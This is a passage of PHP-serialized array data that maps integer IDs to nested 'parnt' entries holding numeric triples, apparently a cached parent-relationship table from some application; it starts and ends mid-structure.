"parnt\";a:1:{i:0;a:3:{i:0;i:14;i:1;i:0;i:2;i:1;}}}i:69;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:242;i:1;i:0;i:2;i:1;}}}}i:368;a:13:{i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:4;a:1:{s:5:\"parnt\";a:2:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}i:1;a:3:{i:0;i:163;i:1;i:0;i:2;i:2;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:11;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:7;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:6;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:11;i:1;i:0;i:2;i:1;}}}i:79;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:243;i:1;i:0;i:2;i:1;}}}i:14;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:33;i:1;i:0;i:2;i:1;}}}i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:141;i:1;i:0;i:2;i:1;}}}i:2;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:141;i:1;i:0;i:2;i:1;}}}}i:369;a:5:{i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:13;i:1;i:0;i:2;i:1;}}}i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:141;i:1;i:0;i:2;i:1;}}}i:2;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:141;i:1;i:0;i:2;i:1;}}}i:39;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:77;i:1;i:0;i:2;i:1;}}}i:16;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:244;i:1;i:0;i:2;i:1;}}}}i:370;a:1:{i:16;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:245;i:1;i:0;i:2;i:1;}}}}i:371;a:1:{i:16;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:244;i:1;i:0;i:2;i:1;}}}}i:372;a:1:{i:29;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}}i:373;a:8:{i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:11;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:7;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:6;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}}i:374;a:10:{i:69;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:151;i:1;i:0;i:2;i:1;}}}i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:13;i:1;i:0;i:2;i:1;}}}i:15;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:98;i:1;i:0;i:2;i:1;}}}i:42;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:26;i:1;i:0;i:2;i:1;}}}i:79;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:243;i:1;i:0;i:2;i:1;}}}i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:246;i:1;i:0;i:2;i:1;}}}i:2;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:247;i:1;i:0;i:2;i:1;}}}i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:248;i:1;i:0;i:2;i:1;}}}i:76;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:67;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:249;i:1;i:0;i:2;i:1;}}}}i:375;a:2:{i:68;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:16;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:250;i:1;i:0;i:2;i:1;}}}}i:376;a:2:{i:56;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:16;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:251;i:1;i:0;i:2;i:1;}}}}i:377;a:1:{i:76;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:252;i:1;i:0;i:2;i:1;}}}}i:378;a:9:{i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:11;i:1;i:0;i:2;i:1;}}}i:11;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:197;i:1;i:0;i:2;i:1;}}}i:7;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:253;i:1;i:0;i:2;i:1;}}}i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:197;i:1;i:0;i:2;i:1;}}}i:6;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:22;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:50;i:1;i:0;i:2;i:1;}}}i:16;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:254;i:1;i:0;i:2;i:1;}}}i:80;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:255;i:1;i:0;i:2;i:1;}}}i:78;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:256;i:1;i:0;i:2;i:1;}}}}i:379;a:3:{i:20;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:128;i:1;i:0;i:2;i:1;}}}i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:30;i:1;i:0;i:2;i:1;}}}i:40;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}}i:380;a:4:{i:15;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:98;i:1;i:0;i:2;i:1;}}}i:42;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:68;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:1;i:1;i:0;i:2;i:1;}}}}i:381;a:2:{i:1;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:1;i:1;i:0;i:2;i:1;}}}i:2;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:2;i:1;i:0;i:2;i:1;}}}}i:382;a:2:{i:1;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:1;i:1;i:0;i:2;i:1;}}}i:2;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:2;i:1;i:0;i:2;i:1;}}}}i:383;a:4:{i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:40;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}}i:384;a:1:{i:1;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:1;i:1;i:0;i:2;i:1;}}}}i:385;a:1:{i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}}i:386;a:1:{i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}}i:387;a:1:{i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}}i:388;a:3:{i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:120;i:1;i:0;i:2;i:1;}}}i:20;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:41;i:1;i:0;i:2;i:1;}}}i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:170;i:1;i:0;i:2;i:1;}}}}i:389;a:1:{i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}}i:390;a:4:{i:20;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:113;i:1;i:0;i:2;i:1;}}}i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:154;i:1;i:0;i:2;i:1;}}}i:22;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:50;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:113;i:1;i:0;i:2;i:1;}}}}i:391;a:9:{i:29;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}i:11;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:7;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:6;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}}i:392;a:1:{i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:108;i:1;i:0;i:2;i:1;}}}}i:393;a:1:{i:40;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}}i:394;a:6:{i:55;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:78;i:1;i:0;i:2;i:1;}}}i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:257;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:257;i:1;i:0;i:2;i:1;}}}i:1;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:1;i:1;i:0;i:2;i:1;}}}}i:395;a:2:{i:32;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:103;i:1;i:0;i:2;i:1;}}}i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:13;i:1;i:0;i:2;i:1;}}}}i:396;a:3:{i:32;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:103;i:1;i:0;i:2;i:1;}}}i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:104;i:1;i:0;i:2;i:1;}}}i:53;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:95;i:1;i:0;i:2;i:1;}}}}i:397;a:8:{i:44;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:66;i:1;i:0;i:2;i:1;}}}i:5;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:33;i:1;i:0;i:2;i:1;}}}i:11;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:7;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:113;i:1;i:0;i:2;i:1;}}}i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:6;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:113;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:258;i:1;i:0;i:2;i:1;}}}}i:398;a:4:{i:11;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:7;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:6;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}}i:399;a:1:{i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:45;i:1;i:0;i:2;i:1;}}}}i:400;a:4:{i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:136;i:1;i:0;i:2;i:1;}}}i:20;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:141;i:1;i:0;i:2;i:1;}}}i:22;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:50;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:3;i:1;i:0;i:2;i:1;}}}}i:401;a:1:{i:1;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:1;i:1;i:0;i:2;i:1;}}}}i:402;a:1:{i:2;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:2;i:1;i:0;i:2;i:1;}}}}i:403;a:17:{i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:11;i:1;i:0;i:2;i:1;}}}i:11;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:205;i:1;i:0;i:2;i:1;}}}i:7;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:259;i:1;i:0;i:2;i:1;}}}i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:205;i:1;i:0;i:2;i:1;}}}i:6;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:259;i:1;i:0;i:2;i:1;}}}i:49;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:161;i:1;i:0;i:2;i:1;}}}i:20;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:260;i:1;i:0;i:2;i:1;}}}i:40;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:164;i:1;i:0;i:2;i:1;}}}i:51;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:261;i:1;i:0;i:2;i:1;}}}i:50;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:262;i:1;i:0;i:2;i:1;}}}i:28;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:263;i:1;i:0;i:2;i:1;}}}i:16;a:1:{s:5:\"parnt\";a:3:{i:0;a:3:{i:0;i:264;i:1;i:0;i:2;i:1;}i:1;a:3:{i:0;i:265;i:1;i:0;i:2;i:2;}i:2;a:3:{i:0;i:266;i:1;i:0;i:2;i:3;}}}i:46;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:267;i:1;i:0;i:2;i:1;}}}i:47;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:268;i:1;i:0;i:2;i:1;}}}i:48;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:268;i:1;i:0;i:2;i:1;}}}i:38;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:269;i:1;i:0;i:2;i:1;}}}}i:404;a:1:{i:14;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:10;i:1;i:0;i:2;i:1;}}}}i:405;a:1:{i:14;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:33;i:1;i:0;i:2;i:1;}}}}i:406;a:1:{i:14;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:5;i:1;i:0;i:2;i:1;}}}}i:407;a:2:{i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:13;i:1;i:0;i:2;i:1;}}}i:14;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:10;i:1;i:0;i:2;i:1;}}}}i:408;a:5:{i:18;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}}i:409;a:3:{i:22;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:270;i:1;i:0;i:2;i:1;}}}i:14;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:5;i:1;i:0;i:2;i:1;}}}i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:271;i:1;i:0;i:2;i:1;}}}}i:410;a:5:{i:18;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}i:11;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:272;i:1;i:1;i:2;i:1;}}}i:7;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:272;i:1;i:1;i:2;i:1;}}}i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:273;i:1;i:1;i:2;i:1;}}}i:6;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:272;i:1;i:1;i:2;i:1;}}}}i:411;a:2:{i:14;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:10;i:1;i:0;i:2;i:1;}}}i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:271;i:1;i:1;i:2;i:1;}}}}i:412;a:1:{i:16;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}}i:413;a:3:{i:28;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:231;i:1;i:0;i:2;i:1;}}}i:18;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:274;i:1;i:0;i:2;i:1;}}}i:14;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:10;i:1;i:0;i:2;i:1;}}}}i:414;a:1:{i:28;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:30;i:1;i:0;i:2;i:1;}}}}i:415;a:3:{i:38;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:1;i:2;i:1;}}}i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:13;i:1;i:0;i:2;i:1;}}}i:40;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}}i:416;a:2:{i:38;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:1;i:2;i:1;}}}i:40;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}}i:417;a:1:{i:11;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:271;i:1;i:1;i:2;i:1;}}}}i:418;a:1:{i:14;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:5;i:1;i:0;i:2;i:1;}}}}i:419;a:2:{i:28;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:275;i:1;i:0;i:2;i:1;}}}i:81;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:229;i:1;i:0;i:2;i:1;}}}}i:420;a:1:{i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:30;i:1;i:0;i:2;i:1;}}}}i:421;a:1:{i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:258;i:1;i:0;i:2;i:1;}}}}i:422;a:1:{i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:30;i:1;i:0;i:2;i:1;}}}}i:423;a:5:{i:15;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:61;i:1;i:0;i:2;i:1;}}}i:11;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:8;i:1;i:0;i:2;i:1;}}}i:7;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:14;i:1;i:0;i:2;i:1;}}}i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:276;i:1;i:0;i:2;i:1;}}}i:6;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:14;i:1;i:0;i:2;i:1;}}}}i:424;a:5:{i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:223;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:37;i:1;i:0;i:2;i:1;}}}}i:425;a:5:{i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:90;i:1;i:0;i:2;i:1;}}}}i:426;a:4:{i:15;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:98;i:1;i:0;i:2;i:1;}}}i:42;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:26;i:1;i:0;i:2;i:1;}}}i:56;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:14;i:1;i:0;i:2;i:1;}}}i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:188;i:1;i:0;i:2;i:1;}}}}i:427;a:1:{i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:277;i:1;i:0;i:2;i:1;}}}}i:428;a:1:{i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}}i:429;a:2:{i:20;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:278;i:1;i:0;i:2;i:1;}}}i:14;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:10;i:1;i:0;i:2;i:1;}}}}i:430;a:2:{i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:11;i:1;i:0;i:2;i:1;}}}i:35;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}}i:431;a:4:{i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:113;i:1;i:0;i:2;i:1;}}}i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:113;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}}i:432;a:1:{i:53;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:95;i:1;i:0;i:2;i:1;}}}}i:433;a:2:{i:14;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:10;i:1;i:0;i:2;i:1;}}}i:15;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:61;i:1;i:0;i:2;i:1;}}}}i:434;a:7:{i:18;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:279;i:1;i:0;i:2;i:1;}}}i:28;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:280;i:1;i:0;i:2;i:1;}}}i:50;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:281;i:1;i:0;i:2;i:1;}}}i:11;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:282;i:1;i:0;i:2;i:1;}}}i:7;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:282;i:1;i:0;i:2;i:1;}}}i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:282;i:1;i:0;i:2;i:1;}}}i:6;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:282;i:1;i:0;i:2;i:1;}}}}i:435;a:4:{i:11;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:118;i:1;i:0;i:2;i:1;}}}i:7;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:118;i:1;i:0;i:2;i:1;}}}i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:118;i:1;i:0;i:2;i:1;}}}i:6;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:118;i:1;i:0;i:2;i:1;}}}}i:436;a:2:{i:40;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:13;i:1;i:0;i:2;i:1;}}}}i:437;a:10:{i:15;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:98;i:1;i:0;i:2;i:1;}}}i:28;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:283;i:1;i:0;i:2;i:1;}}}i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:11;i:1;i:0;i:2;i:1;}}}i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:284;i:1;i:0;i:2;i:1;}}}i:2;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:284;i:1;i:0;i:2;i:1;}}}i:49;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:285;i:1;i:0;i:2;i:1;}}}i:67;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:286;i:1;i:0;i:2;i:1;}}}i:78;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:241;i:1;i:0;i:2;i:1;}}}i:17;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:23;i:1;i:0;i:2;i:1;}}}i:80;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:255;i:1;i:0;i:2;i:1;}}}}i:438;a:11:{i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:13;i:1;i:0;